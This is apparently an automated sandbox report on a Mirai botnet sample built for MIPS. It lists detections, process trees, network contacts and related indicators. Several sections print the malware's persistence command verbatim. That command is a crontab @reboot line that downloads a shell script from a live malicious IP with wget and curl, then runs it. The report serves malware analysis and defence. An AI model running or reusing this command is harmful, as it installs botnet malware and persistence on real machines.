Edit tour

Linux Analysis Report
mips.elf

Overview

General Information

Sample name:mips.elf
Analysis ID:1646350
MD5:edaaecc9d94e0b0937395cc89f86ccd5
SHA1:c8f6c51910c7653008733fa7071f9626ddc78240
SHA256:75c419a37904ca4181899cb9be322afa7cddc7d558d1c6715594deb7a8d76049
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai
Score:72
Range:0 - 100

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Executes the "crontab" command typically for achieving persistence
Creates hidden files and/or directories
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sleeps for long times indicative of sandbox evasion
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1646350
Start date and time:2025-03-23 22:55:52 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 57s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:mips.elf
Detection:MAL
Classification:mal72.troj.linELF@0/48@2/0
  • VT rate limit hit for: api.znet.homes
Command:/tmp/mips.elf
PID:6258
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
we kinda rocking ngl
Standard Error:
  • system is lnxubuntu20
  • mips.elf (PID: 6258, Parent: 6174, MD5: 0083f1f0e77be34ad27f849842bbb00c) Arguments: /tmp/mips.elf
    • mips.elf New Fork (PID: 6260, Parent: 6258)
      • mips.elf New Fork (PID: 6262, Parent: 6260)
      • mips.elf New Fork (PID: 6267, Parent: 6260)
      • mips.elf New Fork (PID: 6269, Parent: 6260)
      • mips.elf New Fork (PID: 6271, Parent: 6260)
      • sh (PID: 6271, Parent: 6260, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
        • sh New Fork (PID: 6273, Parent: 6271)
          • sh New Fork (PID: 6275, Parent: 6273)
          • crontab (PID: 6275, Parent: 6273, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -l
          • sh New Fork (PID: 6276, Parent: 6273)
          • chmod (PID: 6276, Parent: 6273, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x bins.sh
          • sh New Fork (PID: 6277, Parent: 6273)
          • sh (PID: 6277, Parent: 6273, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh bins.sh
          • sh New Fork (PID: 6278, Parent: 6273)
          • curl (PID: 6278, Parent: 6273, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
        • sh New Fork (PID: 6274, Parent: 6271)
        • crontab (PID: 6274, Parent: 6271, MD5: 66e521d421ac9b407699061bf21806f5) Arguments: crontab -
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
mips.elfJoeSecurity_Mirai_9Yara detected MiraiJoe Security
    SourceRuleDescriptionAuthorStrings
    6262.1.00007f4728400000.00007f472841a000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
      6258.1.00007f4728400000.00007f472841a000.r-x.sdmpJoeSecurity_Mirai_9Yara detected MiraiJoe Security
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: mips.elfAvira: detected
        Source: mips.elfVirustotal: Detection: 25%Perma Link
        Source: mips.elfReversingLabs: Detection: 25%
        Source: mips.elfString: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmips->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
        Source: mips.elfString: /bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"
        Source: mips.elfString: j2go/proc/net/tcp5.188.230.23137.18.73.94167.235.128.15168.191.23.13445.195.74.233141.94.21.7118.220.154.2118.210.151.8537.187.153.12745.195.74.1970123456789ABCDEF(crontab -l ; echo "@reboot %s") | crontab -/bin/bash -c "/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh"%s/.bashrca

        Networking

        barindex
        Source: global trafficTCP traffic: 155.138.230.16 ports 1290,0,1,2,80,9
        Source: global trafficTCP traffic: 192.168.2.23:59752 -> 155.138.230.16:1290
        Source: /tmp/mips.elf (PID: 6258)Socket: 127.0.0.1:4161Jump to behavior
        Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
        Source: global trafficTCP traffic: 192.168.2.23:43252 -> 155.138.230.16:80
        Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
        Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
        Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: api.znet.homes
        Source: mips.elfString found in binary or memory: http://155.138.230.16/bins/bins.sh;
        Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
        Source: Initial sampleString containing 'busybox' found: /bin/busybox
        Source: Initial sampleString containing 'busybox' found: /proc//exedvrHelper/proc/%d/cwd/var/tmp/proc/%d/fd.../proc/%d/fd/%s/proc/proc/%d/stat /cmdline/wget/tftp/curl/reboot/libbin//dev/watchdog/dev/misc/watchdogmips->unknown%d/bin/busybox/bin/sh/var/Sofiatelnetd
        Source: ELF static info symbol of initial sample.symtab present: no
        Source: /tmp/mips.elf (PID: 6262)SIGKILL sent: pid: 6262, result: unknownJump to behavior
        Source: classification engineClassification label: mal72.troj.linELF@0/48@2/0

        Persistence and Installation Behavior

        barindex
        Source: /bin/sh (PID: 6275)Crontab executable: /usr/bin/crontab -> crontab -lJump to behavior
        Source: /bin/sh (PID: 6274)Crontab executable: /usr/bin/crontab -> crontab -Jump to behavior
        Source: /bin/curl (PID: 6278)Directory: /root/.curlrcJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1582/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1582/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1582/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/3088/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/3088/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/3088/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/230/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/230/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/230/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/110/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/110/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/110/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/231/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/231/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/231/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/111/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/111/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/111/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/232/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/232/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/232/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1579/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1579/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1579/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/112/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/112/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/112/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/233/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/233/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/233/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1699/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1699/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1699/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/113/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/113/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/113/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/234/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/234/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/234/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1335/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1335/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1335/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1698/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1698/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1698/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/114/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/114/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/114/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/235/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/235/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/235/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1334/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1334/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1334/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1576/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1576/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/1576/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2302/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2302/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2302/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/115/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/115/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/115/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/236/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/236/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/236/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/116/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/116/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/116/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/237/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/237/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/237/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/117/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/117/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/117/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/118/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/118/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/118/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/910/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/910/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/910/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/119/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/119/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/119/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/912/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/912/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/912/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/10/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/10/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/10/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2307/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2307/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/2307/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/11/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/11/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/11/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/918/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/918/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/918/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/12/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/12/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/12/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/13/statJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/13/cmdlineJump to behavior
        Source: /tmp/mips.elf (PID: 6262)File opened: /proc/13/fdJump to behavior
        Source: /tmp/mips.elf (PID: 6271)Shell command executed: sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"Jump to behavior
        Source: /bin/sh (PID: 6276)Chmod executable: /usr/bin/chmod -> chmod +x bins.shJump to behavior
        Source: /tmp/mips.elf (PID: 6269)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/mips.elf (PID: 6269)Sleeps longer then 60s: 60.0sJump to behavior
        Source: /tmp/mips.elf (PID: 6258)Queries kernel information via 'uname': Jump to behavior
        Source: mips.elf, 6258.1.0000560438b51000.0000560438bf9000.rw-.sdmp, mips.elf, 6262.1.0000560438b51000.0000560438bf9000.rw-.sdmpBinary or memory string: V!/etc/qemu-binfmt/mips
        Source: mips.elf, 6258.1.0000560438b51000.0000560438bf9000.rw-.sdmp, mips.elf, 6262.1.0000560438b51000.0000560438bf9000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
        Source: mips.elf, 6258.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmp, mips.elf, 6262.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.elf
        Source: mips.elf, 6262.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmpBinary or memory string: V/tmp/qemu-open.IkkmJH
        Source: mips.elf, 6258.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmp, mips.elf, 6262.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
        Source: mips.elf, 6262.1.00007ffd1e07e000.00007ffd1e09f000.rw-.sdmpBinary or memory string: /tmp/qemu-open.IkkmJH

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: mips.elf, type: SAMPLE
        Source: Yara matchFile source: 6262.1.00007f4728400000.00007f472841a000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6258.1.00007f4728400000.00007f472841a000.r-x.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: mips.elf, type: SAMPLE
        Source: Yara matchFile source: 6262.1.00007f4728400000.00007f472841a000.r-x.sdmp, type: MEMORY
        Source: Yara matchFile source: 6258.1.00007f4728400000.00007f472841a000.r-x.sdmp, type: MEMORY
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information2
        Scripting
        Valid Accounts1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Scheduled Task/Job
        1
        Virtualization/Sandbox Evasion
        1
        OS Credential Dumping
        11
        Security Software Discovery
        Remote ServicesData from Local System1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job2
        Scripting
        Boot or Logon Initialization Scripts1
        File and Directory Permissions Modification
        LSASS Memory1
        Virtualization/Sandbox Evasion
        Remote Desktop ProtocolData from Removable Media1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
        Hidden Files and Directories
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction
        No configs have been found
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Number of created Files
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646350 Sample: mips.elf Startdate: 23/03/2025 Architecture: LINUX Score: 72 36 api.znet.homes 155.138.230.16, 1290, 80 AS-CHOOPAUS United States 2->36 38 109.202.202.202, 80 INIT7CH Switzerland 2->38 40 2 other IPs or domains 2->40 42 Antivirus / Scanner detection for submitted sample 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected Mirai 2->46 48 Connects to many ports of the same IP (likely port scanning) 2->48 10 mips.elf 2->10         started        signatures3 process4 process5 12 mips.elf 10->12         started        process6 14 mips.elf sh 12->14         started        16 mips.elf 12->16         started        18 mips.elf 12->18         started        20 mips.elf 12->20         started        process7 22 sh 14->22         started        24 sh crontab 14->24         started        signatures8 27 sh crontab 22->27         started        30 sh chmod 22->30         started        32 sh sh 22->32         started        34 sh curl 22->34         started        50 Executes the "crontab" command typically for achieving persistence 24->50 process9 signatures10 52 Executes the "crontab" command typically for achieving persistence 27->52
        SourceDetectionScannerLabelLink
        mips.elf25%VirustotalBrowse
        mips.elf25%ReversingLabsLinux.Backdoor.Mirai
        mips.elf100%AviraEXP/ELF.Mirai.W
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://155.138.230.16/bins/bins.sh;100%Avira URL Cloudmalware

        Download Network PCAP: filteredfull

        NameIPActiveMaliciousAntivirus DetectionReputation
        api.znet.homes
        155.138.230.16
        truetrue
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://155.138.230.16/bins/bins.sh;mips.elffalse
          • Avira URL Cloud: malware
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          155.138.230.16
          api.znet.homesUnited States
          20473AS-CHOOPAUStrue
          109.202.202.202
          unknownSwitzerland
          13030INIT7CHfalse
          91.189.91.43
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          91.189.91.42
          unknownUnited Kingdom
          41231CANONICAL-ASGBfalse
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          155.138.230.16mipsel.elfGet hashmaliciousMiraiBrowse
            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
            91.189.91.43mipsel.elfGet hashmaliciousMiraiBrowse
              bot.elfGet hashmaliciousUnknownBrowse
                parm5.elfGet hashmaliciousUnknownBrowse
                  pmips.elfGet hashmaliciousMiraiBrowse
                    gigab.sh4.elfGet hashmaliciousUnknownBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        whisper.armv5.elfGet hashmaliciousUnknownBrowse
                          na.elfGet hashmaliciousPrometeiBrowse
                            gigab.x86.elfGet hashmaliciousUnknownBrowse
                              na.elfGet hashmaliciousPrometeiBrowse
                                91.189.91.42mipsel.elfGet hashmaliciousMiraiBrowse
                                  bot.elfGet hashmaliciousUnknownBrowse
                                    parm5.elfGet hashmaliciousUnknownBrowse
                                      pmips.elfGet hashmaliciousMiraiBrowse
                                        gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                          na.elfGet hashmaliciousPrometeiBrowse
                                            whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                              na.elfGet hashmaliciousPrometeiBrowse
                                                gigab.x86.elfGet hashmaliciousUnknownBrowse
                                                  na.elfGet hashmaliciousPrometeiBrowse
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    api.znet.homesmipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 155.138.230.16
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    AS-CHOOPAUSmipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 155.138.230.16
                                                    Setup.exeGet hashmaliciousUnknownBrowse
                                                    • 45.32.1.23
                                                    xpmg.exeGet hashmaliciousUnknownBrowse
                                                    • 155.138.150.12
                                                    courtyardhealthcare.com.exeGet hashmaliciousUnknownBrowse
                                                    • 139.180.160.173
                                                    compited.ps1Get hashmaliciousUnknownBrowse
                                                    • 139.180.160.173
                                                    Nyx4r.mpsl.elfGet hashmaliciousOkiruBrowse
                                                    • 44.168.169.166
                                                    hoho.armv5l.elfGet hashmaliciousUnknownBrowse
                                                    • 44.174.49.98
                                                    yarn.elfGet hashmaliciousUnknownBrowse
                                                    • 149.253.222.204
                                                    https://metamaeasskelog.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                    • 45.32.7.89
                                                    http://metamaskelogines.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                                    • 155.138.141.200
                                                    CANONICAL-ASGBmipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    owari.arm6.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    bot.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    parm5.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    pmips.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 91.189.91.42
                                                    whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 91.189.91.42
                                                    gigab.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    CANONICAL-ASGBmipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    owari.arm6.elfGet hashmaliciousUnknownBrowse
                                                    • 185.125.190.26
                                                    bot.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    parm5.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    pmips.elfGet hashmaliciousMiraiBrowse
                                                    • 91.189.91.42
                                                    gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 91.189.91.42
                                                    whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 91.189.91.42
                                                    gigab.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 91.189.91.42
                                                    INIT7CHmipsel.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    bot.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    parm5.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    pmips.elfGet hashmaliciousMiraiBrowse
                                                    • 109.202.202.202
                                                    gigab.sh4.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 109.202.202.202
                                                    whisper.armv5.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 109.202.202.202
                                                    gigab.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 109.202.202.202
                                                    na.elfGet hashmaliciousPrometeiBrowse
                                                    • 109.202.202.202
                                                    No context
                                                    No context
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
                                                    Entropy (8bit):2.652525069330869
                                                    Encrypted:false
                                                    SSDEEP:3:i6BIPLvVBdSQhVvX:ikAvVWGf
                                                    MD5:7B54AA3F3C52B9EE5D562637785F4485
                                                    SHA1:AF2DBD2D807BDDB1317E4856DDA80EFA530D088A
                                                    SHA-256:9CF916E228D45F0D15DFF05C73695D8DEFF8C57E39B85D39821F56FC52AEF2BD
                                                    SHA-512:44CC32EFF0DCBA9C84DCBDADF043AE974F106D3BD4EA763FFA36F0C3FE57C259C84726954E176441353BD75BADB375FDBFDE42381B7C1CE21D53E7083827277C
                                                    Malicious:false
                                                    Reputation:low
                                                    Preview:6267 (/tmp/mips.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                                                    Process:/tmp/mips.elf
                                                    File Type:ASCII text
                                                    Category:dropped
                                                    Size (bytes):114
